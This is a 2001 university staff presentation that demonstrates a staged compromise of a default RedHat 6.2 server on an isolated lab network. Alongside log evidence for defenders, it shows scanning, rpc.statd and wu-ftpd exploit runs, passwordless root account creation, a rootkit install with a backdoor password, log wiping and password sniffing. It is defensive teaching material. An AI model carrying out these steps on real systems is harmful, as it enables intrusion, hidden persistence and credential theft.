Version 0.2
Presented by the LSU Office of Computing Services, High Performance Computing Staff.
Return to the Top of Page
Introduction
The Presenters
- Isaac W. Traxler
B.S in Mathematics, M.S. in Computer Science. A systems administrator for over 20 years.
- Allen B. Gordon
B.S in Computer Science. A systems administrator for over 5 years.
- Brian D. Ropers-Huilman
B.S in Electrical Computer Engineering. A systems administrator for over 10 years.
The Presentation
This presentation will demonstrate a live crack of a GNU/Linux server.
Although we have "pre-staged" the software, and have obviously tested the entire scenario, all the techniques and software we will use were gathered from the Internet.
This presentation is not a lesson on "How To Crack." Instead, the focus will be on demonstrating the mechanics of a crack with a typical cracker scenario.
As such, we will spend much of the time looking at the state of the cracked system.
Our point is to show how simple it can be to crack a vulnerable system, given the necessary tools, preparation, and enough time.
Throughout the presentation we will attempt to make each step clear by defining the purpose of a task and giving a top-level explaination of the technology being used.
Please feel free to ask clarifying questions as the presentation progresses.
Scenario
These systems are all part of the Here.com domain that belongs to a fictitious company which is connected to the Internet.
We are assuming that the system the cracker is going to use, emaca.here.com, has already been compromised, or is a disgruntled employee within the organization, or is a true cracker "stealing" a connection from the company's IP space.
Return to the Top of Page
Hardware Description
This is a description of each of the systems used in the demonstration.
They are all connected to a completely private Ethernet network.
Cracked System
- The primary server for Here.com
- IBM 350 (P @ 166 MHz, 64 MB RAM)
- Default RedHat v6.2 Server Install
- server.here.com
- 192.168.3.2
Cracker's System
- A workstation on Here.com's company network
- IBM ThinkPad 760ED (P @ 133 MHz, 48 MB RAM)
- Custom RedHat v7.1 Install
- emaca.here.com
- 192.168.3.236
Employee / Presentation System
- An employee's system on Here.com's company network
- IBM ThinkPad 770ED (PII @ 233 MHz, 192 MB RAM)
- Custom RedHat v7.1 Install
- john.here.com
- 192.168.3.3
Network
- Simulated Here.com company network
- 3Com Home Connect Hub, 5 port 10 Mb/sec with Category 5 cables
- /etc/hosts without DNS
- Domain here.com
- 192.168.3.0/24
Return to the Top of Page
Software Description
This is a description of all the major software used on each of the systems.
Again, all of this software was pulled directly from the Internet.
Cracked System
- Default services running (httpd, ftp, nfs, etc.) based on RedHat v6.2 default server installation
- No customizations, except to add a legitimate employee john, so that he can do his work
Cracker's System
- nmap v2.54-BETA26-1
- Exploit for rpc.statd
- Exploit for wu-ftpd
- RootKit IV for GNU/Linux
- ethereal v0.8.18-1 network sniffer
Employee / Presentation System
- ethereal v0.8.15-2 network sniffer
Return to the Top of Page
The Crack
Here is a top level view of how the crack will proceed:
Return to the Top of Page
nmap of Here.com
The cracker
nmap, available from http://www.nmap.org, provides "network-wide ping sweep, portscan and OS detection."
It is a tool widely used, by both crackers and network/system administrators, to map out a network.
The cracker runs nmapfe, the graphical interface to nmap, using the defaults:
- SYN Stealth
- TCP & ICMP
- OS detection
The cracker only needs to enter the IP network to scan: 192.168.3.0/24 (which is the base network address with the number of bits in the sub-net mask).
The command-line would be:
nmap -sS -O 192.168.3.0/24
Here's the output:
Starting nmap V. 2.54BETA26 ( www.insecure.org/nmap/ )
Host (192.168.3.0) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Adding open port 513/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 956/tcp
Adding open port 23/tcp
Adding open port 113/tcp
Adding open port 79/tcp
Adding open port 80/tcp
Adding open port 21/tcp
Adding open port 514/tcp
Adding open port 515/tcp
Adding open port 98/tcp
Adding open port 25/tcp
Interesting ports on server.here.com (192.168.3.2):
(The 1535 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
79/tcp open finger
80/tcp open http
98/tcp open linuxconf
111/tcp open sunrpc
113/tcp open auth
513/tcp open login
514/tcp open shell
515/tcp open printer
956/tcp open unknown
1024/tcp open kdm
Remote operating system guess: Linux 2.1.19 - 2.2.17
Uptime 0.802 days (since Tue Jul 10 17:57:49 2001)
Adding open port 111/tcp
Adding open port 22/tcp
Adding open port 6000/tcp
Adding open port 3306/tcp
Adding open port 113/tcp
Adding open port 80/tcp
Adding open port 443/tcp
Interesting ports on john.here.com (192.168.3.3):
(The 1541 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
443/tcp open https
3306/tcp open mysql
6000/tcp open X11
Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 0.048 days (since Wed Jul 11 12:03:22 2001)
Adding open port 7/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 22/tcp
Adding open port 6000/tcp
Adding open port 23/tcp
Adding open port 3306/tcp
Adding open port 113/tcp
Adding open port 80/tcp
Interesting ports on emaca.here.com (192.168.3.236):
(The 1539 ports scanned but not shown below are in state: closed)
Port State Service
7/tcp open echo
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
1024/tcp open kdm
3306/tcp open mysql
6000/tcp open X11
Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 0.055 days (since Wed Jul 11 11:53:36 2001)
Host (192.168.3.255) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Nmap run completed -- 256 IP addresses (3 hosts up) scanned in 13 seconds
Now knowing that server is a GNU/Linux system (nmap told us it was running a GNU/Linux kernel), the cracker uses telnet to try and determine which version of GNU/Linux is running, hoping for a default "welcome message:"
[root@emaca log]# telnet server.here.com
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login:
telnet> quit
Connection closed.
[root@emaca log]# exit
The server
Various logs on the server system will show some information about what has been done so far.
/var/log/secure showed the telnet connection used above.
May 16 19:40:54 server in.telnetd[695]: connect from 192.168.3.236
Security conscious system administrators looking at their logs will see a telnet connection without a corresponding login and may become suspicious.
Return to the Top of Page
Initial Sniff
The cracker
After detecting the systems on the network, the cracker decides to sniff the network and see what can be seen.
With ethereal, the cracker simply calls up the GUI, selects "Capture packets in promiscuous mode," and deselect "Enable name resolution," and starts capturing packets.
Functioning just like Network General's sniffer, data can be viewed in a very raw form.
ethereal also allows the cracker to choose Tools | Follow TCP Stream and "see" a connection to the server. In this case, the cracker can see john logging in to server to do real work, capturing his password.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
server login: jjoohhnn
�
Password: abc123
�
�]0;john@server: /home/john�[john@server john]$ ccdd ppuubblliicc__hhttmmll
�
�]0;john@server: /home/john/public_html�[john@server public_html]$ ccaatt iinnddeexx..hhttmmll
�
<html>
<head><title>My Important Work</title></head>
<body>
<h1>Very Important Stuff</h1>
This is my stuff
</body>
</html>
�]0;john@server: /home/john/public_html�[john@server public_html]$ eexxiitt
�
logout
�[H�[2J
Notice that you can see each typed character and its echo back to the client.
The cracker was lucky to get this information, but we'll pretend we didn't learn this and proceed with the planned crack.
The server
The server will show user john's legitimate login, but it will not show any indication that the network is being sniffed.
Here is the server system's /var/log/messages entry for john's login:
May 16 19:42:12 server PAM_pwdb[702]: (login) session opened for user john by (uid=0)
And here is the server system's /var/log/secure entry for john's login:
May 16 19:42:03 server in.telnetd[701]: connect from 192.168.3.3
May 16 19:42:12 server login: LOGIN ON 0 BY john FROM 192.168.3.3
Being suspicious, the system administrator issues a who to see who's on the system:
[root@server /root]# who
root tty1 May 16 19:37
[root@server /root]#
Return to the Top of Page
Initial Exploit
The cracker
Seeing from the nmap scan that the server system is running sunrpc services and knowing that server is a RedHat GNU/Linux system, the cracker attempts to use an rpc.statd exploit specifically made for GNU/Linux.
The rpc.statd is part of the Network File System (NFS) which is installed by default on both client and server installations and is rarely used.
Here's what happens:
[root@emaca statd]# cat crack
./statd.xpl -a 0xbffff315 -s 20 server.here.com
[root@emaca statd]# ./crack
wiping: 9
buffer: 0xbffff315/1024/999
target: 0xbffff719 --> 0xbffff56d/buffer[600]
method: return address
command:
--
Failed - statd returned res_stat: (failure) state: 13
This exploit failed.
It's attempting to "buffer-overflow" the rpc.statd program.
A buffer-overflow is a technique to send too much data to a service.
The extra data is actually system executable code that runs and provides a "root shell" to the cracker.
The server
The administrator of the server system can see the exploit attempt by looking in the /var/log/messages log.
May 16 19:38:33 server rpc.statd[353]: gethostbyname error for ^Y÷ÿ¿^Y÷ÿ¿^[÷ÿ¿^[
÷ÿ¿bffff760 8049710 8052c20687465676274736f6d616e797265206520726f7220726f66
The buffer overflow is clearly visible. Unfortunately, you can not see which system tried to exploit you.
The system administrator looks at the /etc/passwd file to verify the integrity of the system:
[root@server /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash
Return to the Top of Page
Successful Exploit
The cracker
Not daunted by the first failure, the cracker attempts a second exploit.
Based on the nmap and telnet from above and a little extra knowledge, the cracker has the following information:
- server is running an FTP server
- server is a RedHat v6.2 GNU/Linux system
- RedHat v6.2 GNU/Linux uses wu-ftpd v2.6.0-3 as the default FTP server
Based on this, the cracker tries a wu-ftpd exploit.
[root@emaca wu-ftp]# ./f server
Connected to: server
Banner: 220 server.here.com FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
Logged in..
+ Finding ret addresses
[1m[32mWuftpd is vulnerable : 200-31 bffff548 1ee bfffd4d0 +bfffd0cc |0
200 (end of '%x %x %x %x +%x |%x')
[0mRet location befor: 0
Ret location : bfffd074
Proctitle addres : 807347b and 134689915
tmp 1 : 0x62626262
tmp 2 : 0x0
tmp 1 : 0xbfffd074
Cached a : 24
Trying with : 23
[1m[33m Wait for a shell.....
[0m200-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbtÐÿ¿-2-2000-200000000000000000000000000
0000000nan00000000-2000000000000000000000000000000000000000000000000000000000000
00000000000000-2-240nan0-10737512241074522093-10737512241074533003-1073751144107
5212780-1073751144-1073750870-10737508661713262567819201692631852400175188667652
71702389037163375907516337718731633771873163377187316337718731633771873163377187
31633771873|00000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
.
.
.
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
This exploit works! The cracker can then do the following:
- hostname -- we're on server
- whoami -- root!!!
- who -- cracker is hidden
- echo $SHELL -- to see what shell we have
- export PATH="$PATH:/usr/sbin" -- to add the good stuff to our path
- echo $PATH -- confirm the new path
- adduser -u 0 -g 0 r00t -- a classic cracker root equivalent user (to control the system)
- passwd -d r00t -- remove the password for r00t
- adduser jroberts -- an unpriveleged user account (to allow a telnet connection later)
- passwd -d jroberts -- remove the password for jroberts
The exploit gives the cracker a "root shell" into the server system, but there is no prompt for the shell because it's being handled by the FTP server.
Here are the actual commands the cracker types and the real output:
hostname
server
whoami
root
who
root tty1 May 16 19:37
john pts/0 May 16 19:42
echo $SHELL
/bin/bash
echo $PATH
/usr/local/bin:/bin:/usr/bin
export PATH="$PATH:/usr/sbin"
echo $PATH
/usr/local/bin:/bin:/usr/bin:/usr/sbin
adduser -u 0 -g 0 r00t
passwd -d r00t
Changing password for user r00t
Removing password for user r00t
passwd: Success
adduser jroberts
passwd -d jroberts
Changing password for user jroberts
Removing password for user jroberts
passwd: Success
exit
Connection closed - EOF
[root@emaca wu-ftp]#
At this point, the server system is effectively under the control of the cracker (owned)!
The server
The system administrator on server now sees the following information:
- /var/log/messages -- shows the wu-ftpd buffer overflow and the addition of the new accounts
May 17 01:01:19 server ftpd[746]: ANONYMOUS FTP LOGIN FROM emaca.here.com
[192.168.3.236], 1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1
À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11
May 16 20:04:35 server adduser[756]: new user: name=r00t, uid=0, gid=0,
home=/home/r00t, shell=/bin/bash
May 16 20:05:42 server adduser[758]: new group: name=jroberts, gid=501
May 16 20:05:42 server adduser[758]: new user: name=jroberts, uid=501, gid=501,
home=/home/jroberts, shell=/bin/bash
/var/log/secure -- shows the original FTP connection
May 16 20:01:18 server in.ftpd[746]: connect from 192.168.3.236
At this point, the administrator would realize they have been cracked and would start looking, in detail, at their system.
The easiest thing to look at is the /etc/passwd file:
[root@server /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash
r00t:x:0:0::/home/r00t:/bin/bash
jroberts:x:501:501::/home/jroberts:/bin/bash
Return to the Top of Page
Complete the Takeover
The cracker
At this point the exploit succeeded and the cracker "owns" the system.
The cracker should now think about the following:
- Hiding -- from the real system administrator
- Backdoor -- test the RootKit backdoor for future access
- Clean Up -- clean up logs to hide tracks
- Collect Data -- linsniff, dsniff, /etc/passwd file, etc.
- Use the System -- IRC server, bounce point for other cracks, warez, etc.
Hiding
The cracker will grab their pre-compiled, ready to run RootKit.
A RootKit replaces several system commands with trojaned versions so the cracker can hide things on the system like files, processes, connections, etc.
[root@emaca rk]# ftp server
Connected to server.here.com.
220 server.here.com FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
Name (server:root): jroberts
331 Password required for jroberts.
Password: <ENTER>
230 User jroberts logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put l.tar.gz
local: l.tar.gz remote: l.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for l.tar.gz.
226 Transfer complete.
3207597 bytes sent in 3.44 secs (9.1e+02 Kbytes/sec)
ftp> quit
221-You have transferred 3207597 bytes in 1 files.
221-Total traffic for this session was 3208018 bytes in 1 transfers.
221-Thank you for using the FTP service on server.here.com.
221 Goodbye.
[root@emaca rk]#
The cracker will connect to the server system:
[root@emaca rk]# telnet server
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login: jroberts
Last login: Wed May 16 20:36:29 from emaca.here.com
[jroberts@server jroberts]$
The cracker becomes r00t and unpacks their tools:
[jroberts@server jroberts]$ su - r00t
[root@server r00t]# cd ~jroberts
[root@server jroberts]# ls -l
total 3140
-rw-r--r-- 1 jroberts jroberts 3207597 May 16 20:42 l.tar.gz
[root@server jroberts]# tar -xzf l.tar.gz
[root@server jroberts]# ls
MCONFIG bindshell.c findutils hdar login
psmisc sniffchk wted.c Makefile chfn
fix inetd net-tools-1.32-alpha rootkit.h
sysklogd-1.3 z2 README chsh
fix.c l.tar.gz passwd rshd tcp.log
z2.c bin cron3.0pl1 hdap linsniffer
procps-1.01 shadow-961025 tcpd_7.4
bindshell fileutils-3.13 hdaq linsniffer.c procps-1.01_mess
sniff.pid wted
[root@server jroberts]#
Next, the cracker installs the pre-compiled RootKit:
[root@server jroberts]# make install
if [ -x /usr/bin/chfn ] && [ -x bin/chfn ]; then ./fix /usr/bin/chfn bin/chfn; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chfn fixed
if [ -x /usr/bin/chsh ] && [ -x bin/chsh ]; then ./fix /usr/bin/chsh bin/chsh; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chsh fixed
.
.
.
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /bin/killall ]; then
ln -sf /bin/killall psmisc/pidof; fi
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then
ln -sf /usr/bin/killall psmisc/pidof; fi
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then
./fix /usr/bin/pidof psmisc/pidof; fi
if [ -x /sbin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then
./fix /sbin/pidof psmisc/pidof; fi
if [ -x /usr/bin/find ] && [ -x findutils/find/find ]; then
./fix /usr/bin/find findutils/find/find; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/find fixed
[root@server jroberts]#
The fix commands running above are attempting to change the checksums, from the sum command, to match the original versions of the commands that are being replaced by their trojaned versions.
The cracker will use pre-configured configuration files for the RootKit:
[root@server jroberts]# cp dev.ptyq /dev/ptyq
[root@server jroberts]# cp dev.ptyr /dev/ptyr
[root@server jroberts]# cp dev.ptys /dev/ptys
The cracker will save needed tools:
[root@server jroberts]# mkdir /dev/hda01
[root@server jroberts]# mv z2 /dev/hda01
[root@server jroberts]# mv wted /dev/hda01
[root@server jroberts]# mv linsniffer /dev/hda01
[root@server jroberts]# mv fix /dev/hda01
To prevent a spurious message from appearing at user login time, the cracker edits the /etc/login.defs file and comments out the CREATE_HOME entry.
Backdoor
As part of the RootKit, many standard items are replaced with trojaned versions.
In particular login and rshd allow special access to the server system:
[root@emaca log]# telnet server
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.
Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
server login: root
Password: satori
[root@server /root]# who
root tty1 May 16 19:37
john pts/0 May 16 19:42
[root@server /root]#
The root connection is from the console and the john connection is from our legitimate user doing their work.
Also note that on the initial telnet connection the message configuration error - unknown item 'CREATE_HOME' (notify administrator) is displayed.
This should be an indication to the system administrator of server that something is wrong!
Clean Up
The cracker removes the login records of the two special users r00t and jroberts that were created as well as the ftp connections:
[root@server /root]# last
jroberts ftpd970 emaca.here.com Wed May 16 20:41 - 20:42 (00:00)
jroberts ftpd965 emaca.here.com Wed May 16 20:39 - 20:41 (00:02)
jroberts pts/1 emaca.here.com Wed May 16 20:38 - 21:00 (00:22)
jroberts pts/1 emaca.here.com Wed May 16 20:36 - 20:38 (00:01)
jroberts ftpd857 emaca.here.com Wed May 16 20:34 - 20:35 (00:01)
ftp ftpd823 emaca.here.com Wed May 16 20:30 - 20:31 (00:00)
jroberts pts/1 emaca.here.com Wed May 16 20:29 - 20:30 (00:00)
jroberts ftpd772 emaca.here.com Wed May 16 20:28 - 20:29 (00:00)
ftp ftpd746 emaca.here.com Wed May 16 20:01 still logged in
john pts/0 192.168.3.3 Wed May 16 19:42 still logged in
root tty1 Wed May 16 19:37 still logged in
reboot system boot 2.2.14-5.0 Wed May 16 19:37 (02:12)
[root@server /root]# cd /dev/hda01
[root@server hda01]# ./z2 jroberts
Zap2!
[root@server hda01]# ./z2 jroberts
Zap2!
.
.
.
[root@server hda01]# ./z2 ftp
Zap2!
[root@server hda01]# last
john pts/0 192.168.3.3 Wed May 16 19:42 still logged in
root tty1 Wed May 16 19:37 still logged in
reboot system boot 2.2.14-5.0 Wed May 16 19:37 (02:23)
The cracker removes the two special users that were created:
[root@server hda01]# export PATH="$PATH:/usr/sbin"
[root@server hda01]# userdel r00t
[root@server hda01]# userdel jroberts
[root@server hda01]# rm -fr /home/jroberts
[root@server hda01]# rm -fr /home/r00t
Collect Data
Another part of the RootKit is linsniffer, which has been preconfigured to capture just usernames and passwords:
[root@server hda01]# nohup ./linsniffer &
.
.
.
[root@server hda01]# cat tcp.log
emaca.here.com => server.here.com [21]
USER john
PASS abc123
TUSYST
Y
QUIT
=
----- [FIN]
[root@server hda01]#
Use the System
The cracker can now safely install any type of application they want to.
With a RootKit, directories containing their applications can be hidden, the processes that are running can be hidden, the network connections they make can be hidden, and the disk space they consume can be hidden.
It is common to run an IRC server to create a private chat area for other crackers.
The cracker could either automate the transfer of linsniffer logs or could periodically login, unseen, and collect them. At this point, the cracker can move around completely invisible to the real system administrator and do whatever they want (almost...).
Server
There is nothing to show on ther server system for this part.
If the cracker did their job correctly, all records of the activity will have been erased.
The system administrator who suspects their system has been compromised needs to start doing data forensics, which is a whole other presentation!
The statements and opinions included in these pages
are those of Isaac W. Traxler, Brian D. Ropers-Huilman, Allen B. Gordon only. Any statements and opinions included in these pages are NOT
those of Louisiana State University or the LSU Board of Supervisors.
© 1999-2001 Isaac W. Traxler, Brian D. Ropers-Huilman, Allen B. Gordon
This page last updated 2001/09/21 15:38:52.